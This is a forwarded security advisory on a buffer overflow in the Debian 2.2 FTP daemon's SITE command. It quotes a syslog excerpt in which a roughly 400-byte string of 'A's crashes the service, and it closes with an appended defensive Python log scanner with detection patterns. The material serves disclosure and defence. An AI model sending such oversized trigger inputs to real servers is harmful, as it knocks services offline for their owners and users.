> SecuriTeam web site: http://www.securiteam.com
>
> Debian FTP Daemon Vulnerable to Buffer Overflow (SITE)
> ------------------------------------------------------------------------
>
> SUMMARY
>
> A security vulnerability in Debian FTP Daemon has been discovered. The
> vulnerability arises when a buffer of 400 bytes or more is sent to the
> FTPd daemon in a SITE command.
>
> DETAILS
>
> Vulnerable systems:
> Debian 2.2 (i.e. 2.2r3) default FTPd daemon Version 6.2/OpenBSD/Linux-0.10
>
> Example:
> May 18 12:32:46 ts ftpd[677]: ts FTP server (Version
> 6.2/OpenBSD/Linux-0.10) ready.
> May 18 12:32:47 ts ftpd[677]: command: SITE
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
> May 18 12:32:47 ts ftpd[677]: <--- 500
> May 18 12:32:47 ts ftpd[677]: 'SITE
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
> ': command not understood.
> May 18 12:32:47 ts ftpd[677]: <--- 221
> May 18 12:32:47 ts ftpd[677]: You could at least say goodbye.
> May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service
> terminated
>
>
> ADDITIONAL INFORMATION
>
> The information has been provided by <mailto:[EMAIL PROTECTED]>
> Tamer Sahin.
[ ]'s

***************************
  .''`.   * [EMAIL PROTECTED]   *
 : :' :   * www.hackhour.com.br *
 `. `'`   * Hack Hour Inc.      *
   `-     ***************************
Debian
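As an added defender-side example that is not part of the advisory or of the quoted e-mail: a small Python scanner for ftpd/inetd syslog lines of the kind quoted above. It flags a `SITE` command whose argument reaches the 400-byte size the advisory names, and the inetd "server failing (looping), service terminated" message that followed the crash, which is the sign that the service has been knocked out. The log lines embedded in it are constructed, modelled on the excerpt; the threshold, regexes and function name are this example's own.

```python
import re

# Constructed sample syslog lines, modelled on the advisory's excerpt (one
# SITE command per line; the real log wraps the long argument).
SAMPLE_LOG = [
    "May 18 12:32:46 ts ftpd[677]: ts FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.",
    "May 18 12:32:47 ts ftpd[677]: command: SITE " + "A" * 400,
    "May 18 12:32:47 ts ftpd[677]: <--- 500",
    "May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service terminated",
    "May 18 12:33:01 ts ftpd[680]: command: SITE CHMOD 644 notes.txt",  # benign
]

# Size the advisory gives as the trigger: "a buffer of 400 bytes or more".
SITE_THRESHOLD = 400

TS = r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
FTPD_SITE = re.compile(TS + r"ftpd\[(?P<pid>\d+)\]: command: SITE (?P<arg>.*)$")
INETD_LOOP = re.compile(TS + r"inetd\[\d+\]: ftp/tcp server failing \(looping\), "
                        r"service terminated$")


def scan_ftpd_log(lines, threshold=SITE_THRESHOLD):
    """Return (kind, detail) findings for a sequence of syslog lines.

    kind is 'oversized_site' when a SITE argument is >= threshold bytes, or
    'ftp_service_terminated' when inetd has disabled ftp/tcp after a crash loop.
    """
    findings = []
    for line in lines:
        m = FTPD_SITE.match(line)
        if m:
            size = len(m.group("arg").encode("utf-8"))
            if size >= threshold:
                findings.append(("oversized_site",
                                 f"{m.group('ts')} host={m.group('host')} pid={m.group('pid')} "
                                 f"SITE argument of {size} bytes (>= {threshold})"))
            continue
        m = INETD_LOOP.match(line)
        if m:
            findings.append(("ftp_service_terminated",
                             f"{m.group('ts')} inetd disabled ftp/tcp on {m.group('host')} "
                             "(service unavailable until restarted)"))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_ftpd_log(SAMPLE_LOG):
        print(f"{kind}: {detail}")
```

A `SITE` argument of a few hundred bytes is never legitimate for this daemon, so the size check alone produces few false positives; the inetd line is worth alerting on by itself, since it means FTP is down whatever the cause.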